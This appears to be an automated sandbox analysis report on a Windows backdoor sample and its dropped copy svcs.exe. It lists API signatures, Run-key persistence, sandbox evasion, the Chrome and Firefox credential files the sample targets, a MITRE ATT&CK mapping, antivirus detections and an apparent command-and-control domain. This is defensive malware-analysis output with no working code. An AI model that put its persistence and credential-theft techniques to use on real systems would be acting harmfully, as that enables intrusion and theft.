                      Source: 1m70ggeepT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 1m70ggeepT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 1m70ggeepT.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 1m70ggeepT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 1m70ggeepT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 1m70ggeepT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 1m70ggeepT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CB50
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00457106 push ecx; ret 0_2_00457119
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00457A28 push eax; ret 0_2_00457A46
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00434E56 push ecx; ret 0_2_00434E69
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00457106 push ecx; ret 3_2_00457119
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00457A28 push eax; ret 3_2_00457A46
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00434E56 push ecx; ret 3_2_00434E69
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00406EB0 ShellExecuteW,URLDownloadToFileW,0_2_00406EB0
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeFile created: C:\Users\user\AppData\Roaming\microsofts\svcs.exeJump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\1m70ggeepT.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 0_2_0041AA4A
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 0_2_0041CB50
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040F7A7 Sleep,ExitProcess | 0_2_0040F7A7
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040F7A7 Sleep,ExitProcess | 3_2_0040F7A7
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle | 0_2_0041A748
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle | 3_2_0041A748
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Window / User API: threadDelayed 9426
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Window / User API: foregroundWindowGot 1754
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Evaded block: after key decision | graph_0-47584
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Evaded block: after key decision | graph_0-47556
Source: C:\Users\user\Desktop\1m70ggeepT.exe | API coverage: 6.4 %
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | API coverage: 6.0 %
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6972 | Thread sleep count: 167 > 30
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6972 | Thread sleep time: -83500s >= -30000s
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6760 | Thread sleep count: 175 > 30
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6760 | Thread sleep time: -525000s >= -30000s
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6760 | Thread sleep count: 9426 > 30
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6760 | Thread sleep time: -28278000s >= -30000s
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose | 0_2_00409253
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose | 0_2_0041C291
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose | 0_2_0040C34D
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose | 0_2_00409665
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0044E879 FindFirstFileExA | 0_2_0044E879
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose | 0_2_0040880C
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040783C FindFirstFileW,FindNextFileW | 0_2_0040783C
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW | 0_2_00419AF5
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose | 0_2_0040BB30
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose | 0_2_0040BD37
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose | 3_2_00409253
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose | 3_2_0041C291
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose | 3_2_0040C34D
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose | 3_2_00409665
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0044E879 FindFirstFileExA | 3_2_0044E879
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose | 3_2_0040880C
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040783C FindFirstFileW,FindNextFileW | 3_2_0040783C
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW | 3_2_00419AF5
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose | 3_2_0040BB30
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose | 3_2_0040BD37
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW | 0_2_00407C97
Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_004349F9
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 0_2_0041CB50
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_004432B5 mov eax, dword ptr fs:[00000030h] | 0_2_004432B5
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_004432B5 mov eax, dword ptr fs:[00000030h] | 3_2_004432B5
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00412077 GetProcessHeap,HeapFree | 0_2_00412077
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_004349F9
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00434B47 SetUnhandledExceptionFilter | 0_2_00434B47
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_0043BB22
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_00434FDC
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_004349F9
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_00434B47 SetUnhandledExceptionFilter | 3_2_00434B47
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_0043BB22
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: 3_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 3_2_00434FDC
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 0_2_004120F7
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 3_2_004120F7
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00419627 mouse_event | 0_2_00419627
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Process created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerS0\
Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerS0\caw
Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerneta
Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerS0\a~
Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerS0\
Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerd996caL
Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managernet
Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerS0\E
Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager]
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00434C52 cpuid | 0_2_00434C52
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: EnumSystemLocalesW | 0_2_00452036
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 0_2_004520C3
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: GetLocaleInfoW | 0_2_00452313
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: EnumSystemLocalesW | 0_2_00448404
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 0_2_0045243C
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: GetLocaleInfoW | 0_2_00452543
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 0_2_00452610
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: GetLocaleInfoA | 0_2_0040F8D1
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: GetLocaleInfoW | 0_2_004488ED
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 0_2_00451CD8
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: EnumSystemLocalesW | 0_2_00451F50
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: EnumSystemLocalesW | 0_2_00451F9B
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: EnumSystemLocalesW | 3_2_00452036
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 3_2_004520C3
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: GetLocaleInfoW | 3_2_00452313
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: EnumSystemLocalesW | 3_2_00448404
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 3_2_0045243C
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: GetLocaleInfoW | 3_2_00452543
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 3_2_00452610
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: GetLocaleInfoA | 3_2_0040F8D1
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: GetLocaleInfoW | 3_2_004488ED
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 3_2_00451CD8
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: EnumSystemLocalesW | 3_2_00451F50
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: EnumSystemLocalesW | 3_2_00451F9B
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040B164 GetLocalTime,wsprintfW | 0_2_0040B164
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0041B60D GetComputerNameExW,GetUserNameW | 0_2_0041B60D
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free | 0_2_00449190

Stealing of Sensitive Information

Source: Yara match | File source: 1m70ggeepT.exe, type: SAMPLE
Source: Yara match | File source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 0_2_0040BA12
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 3_2_0040BA12
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 0_2_0040BB30
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: \key3.db | 0_2_0040BB30
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 3_2_0040BB30
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: \key3.db | 3_2_0040BB30

Remote Access Functionality

Source: C:\Users\user\Desktop\1m70ggeepT.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0
Source: Yara match | File source: 1m70ggeepT.exe, type: SAMPLE
Source: Yara match | File source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED
Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: cmd.exe | 0_2_0040569A
Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe | Code function: cmd.exe | 3_2_0040569A
MITRE ATT&CK Matrix (the 14-column matrix was flattened by extraction; rebuilt here as one list per tactic, keeping only the techniques that carry a signature-count badge; the number in parentheses is that badge as shown in the report)

Reconnaissance: no matched techniques
Resource Development: no matched techniques
Initial Access: no matched techniques
Execution: Native API (2); Command and Scripting Interpreter (12); Service Execution (2)
Persistence: DLL Side-Loading (1); Windows Service (1); Registry Run Keys / Startup Folder (11)
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (22); Registry Run Keys / Startup Folder (11)
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (22)
Credential Access: OS Credential Dumping (1); Input Capture (211); Credentials In Files (2)
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (22); Security Software Discovery (121); Virtualization/Sandbox Evasion (1); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: no matched techniques
Collection: Archive Collected Data (11); Input Capture (211); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (11); Encrypted Channel (2); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (1); Application Layer Protocol (21)
Exfiltration: no matched techniques
Impact: System Shutdown/Reboot (1); Defacement (1)
Antivirus, machine learning and genetic malware detection

Initial sample
Source | Detection | Scanner | Label
1m70ggeepT.exe | 79% | Virustotal |
1m70ggeepT.exe | 100% | Avira | BDS/Backdoor.Gen
1m70ggeepT.exe | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\microsofts\svcs.exe | 100% | Avira | BDS/Backdoor.Gen
C:\Users\user\AppData\Roaming\microsofts\svcs.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\microsofts\svcs.exe | 79% | Virustotal |

Unpacked PE files
No Antivirus matches

Domains
Source | Detection | Scanner | Label
leetboy.dynuddns.net | 9% | Virustotal |

URLs
Source | Detection | Scanner | Label
